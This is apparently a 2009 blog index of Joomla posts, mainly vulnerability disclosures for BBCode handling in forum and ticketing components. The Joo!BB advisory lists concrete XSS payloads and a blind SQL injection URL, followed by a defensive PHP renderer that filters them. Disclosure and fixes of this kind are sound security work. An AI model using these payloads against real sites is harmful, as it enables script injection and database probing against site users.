jeffchannell.com

Shameless Google Plug

Posted in Joomla!
2009-08-11 13:58:50 +0000 UTC
Google Search: joomla JFormValidator. Did you mean google FormValidator?

Validate Custom Administrator Form

Posted in Joomla!
2009-08-10 20:20:08 +0000 UTC

I've been working on a custom Joomla component for a client at work, and needed to validate certain aspects of the admin form. I could have recreated the wheel and written my own validation routine, but I really wanted to use Joomla's core validation behavior. What follows is how I managed to validate a form when submitted using the core Joomla toolbar buttons.

Interview at CMSWire

Posted in Joomla!
2009-08-03 21:42:27 +0000 UTC
As I reported earlier, I was interviewed in the not too recent past concerning XSS security and Joomla. I am proud to say that the interview has been posted on CMSWire, with a prominent back link to yours truly in the first paragraph!
The whole interview can be read here.

Joo!BB 0.9.1 Multiple Vulnerabilities

Posted in Joomla!
2009-08-01 05:00:00 +0000 UTC

The Joomla component Joo!BB 0.9.1 suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as Blind SQL Injection in its search feature.

  1. Nested [img] XSS

    [img]http://foo.com/fake.png [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]
  2. Nested [url] XSS

    [url]http://google.com?[url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]
  3. BBCode [color] Tag Injection

    [color=#ff0000;font-size:100px;]XSS[/color]
  4. BBCode [url] Location XSS

    [url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]
  5. BBCode [font] Tag Injection

    [font=Impact, Compacta, Chicago, sans-serif;color:red;]XSS[/font]
  6. BBCode [table] Tag XSS

    [table=border='1' cellspacing='0' cellpadding='0' width='100%'][tr=bgcolor='#ffffff'][td=width='*' onclick='javascript:alert(String.fromCharCode(88,83,83))']XSS[/td][/tr][/table]
  7. Blind SQL Injection

    /index.php?tmpl=component&option=com_joobb&view=search&searchwords=%' and SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
These vulnerabilities have been patched, and users are strongly urged to update to 0.9.1 Patch 1.
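The BBCode issues listed above share one root cause: tag bodies and tag parameters are copied into HTML attributes without validation. The following is an added example of a renderer that avoids this, not Joo!BB's code or its patch; the function names `bb_safe_url` and `bb_render` are hypothetical, and only `[img]`, `[url]` and `[color]` are handled (any other tag stays as escaped text).

```php
<?php
// Added example with hypothetical function names; not taken from Joo!BB.

// Allow-list check: absolute http(s) URL with no whitespace, quotes, angle
// brackets or square brackets. Other schemes (javascript:, data:) are rejected.
function bb_safe_url(string $u): bool
{
    return preg_match('~^https?://[^\s"\'<>\[\]]+$~i', $u) === 1;
}

function bb_render(string $text): string
{
    // 1. Escape the whole post first. HTML is only ever emitted by the
    //    replacements below, from values that passed validation.
    $out = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');

    // 2. [img]: the body must be a single token without brackets or spaces,
    //    so a nested "[img] onerror=..." never becomes part of an attribute.
    $out = preg_replace_callback('~\[img\]([^\[\]\s]+)\[/img\]~i', function ($m) {
        return bb_safe_url($m[1]) ? '<img src="' . $m[1] . '" alt="">' : $m[0];
    }, $out);

    // 3. [url]...[/url] and [url=...]...[/url]: same token rule, plus the
    //    scheme allow-list. A rejected tag is left as inert escaped text.
    $out = preg_replace_callback('~\[url(?:=([^\[\]\s]+))?\]([^\[\]]*)\[/url\]~i', function ($m) {
        $href = $m[1] !== '' ? $m[1] : $m[2];
        return bb_safe_url($href)
            ? '<a href="' . $href . '" rel="nofollow">' . $m[2] . '</a>'
            : $m[0];
    }, $out);

    // 4. [color=...]: a hex colour or a plain colour name and nothing else,
    //    so ';' and ':' cannot reach the style attribute.
    return preg_replace(
        '~\[color=(#(?:[0-9a-f]{3}){1,2}|[a-z]{3,20})\](.*?)\[/color\]~is',
        '<span style="color:$1">$2</span>',
        $out
    );
}

// Inputs: items 4 and 3 from the list above, then two constructed benign posts.
$samples = [
    '[url=javascript:alert(String.fromCharCode(88,83,83))]http://google.com[/url]',
    '[color=#ff0000;font-size:100px;]XSS[/color]',
    '[url=http://example.com/?a=1&b=2]link[/url]',
    '[color=#ff0000]red text[/color]',
];
foreach ($samples as $s) {
    echo bb_render($s), PHP_EOL;  // first two stay literal text, last two render
}
```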

Timeline

Agora 3.0.0 RC1 Rev.4 XSS Vulnerability

Posted in Joomla!
2009-07-16 17:04:45 +0000 UTC

The Joomla component Agora 3.0.0 RC1 Rev.4 suffers from a Persistent XSS vulnerability. This can be exploited by uploading a malicious SWF file as an attachment then embedding it using the [swf] BBCode tag from the local server, thus bypassing any crossdomain policy.

JTag Ticketing System Persistent XSS Vulnerability

Posted in Joomla!
2009-07-12 04:37:23 +0000 UTC

Well, another XSS vulnerable BBCode implementation, this time on JTag Ticketing System. This is the exact same vulnerability I posted about earlier concerning WebAmoeba.

uddeIM BBCode XSS Vulnerability

Posted in Joomla!
2009-07-10 15:34:51 +0000 UTC

The Joomla component uddeIM is vulnerable to XSS injection in its BBCode implementation. Extra CSS parameters can be passed inside the [color] tag, and Internet Explorer versions before 8 will run scripts using the 'expression()' CSS function.

Kunena Forums Persistent XSS Vulnerability

Posted in Joomla!
2009-07-06 20:06:24 +0000 UTC

Here's a rather nasty persistent XSS vulnerability I found today in Kunena Forums. Using nested [img] tags, it is possible to inject script into the forums.

WebAmoeba Ticket System 3.0.0 BBcode XSS

Posted in Joomla!
2009-07-03 20:31:48 +0000 UTC

I found a nice little exploit for WebAmoeba Ticket System 3.0.0, a Joomla help desk component. The vulnerability is with the BBCode library used to parse BBCode tags, as it does not strip javascript: urls from [url] tags.

Quick-Install Joomla on 1&1 Hosting

Posted in Joomla!
2009-07-03 15:16:11 +0000 UTC

A friend of mine was installing Joomla on his 1&1 hosting account, and the FTP transfer was taking forever. I told him I could probably write a script, upload it, and run it and have Joomla ready to be installed faster than his FTP transfer would take. Sure enough, it worked. Here's how: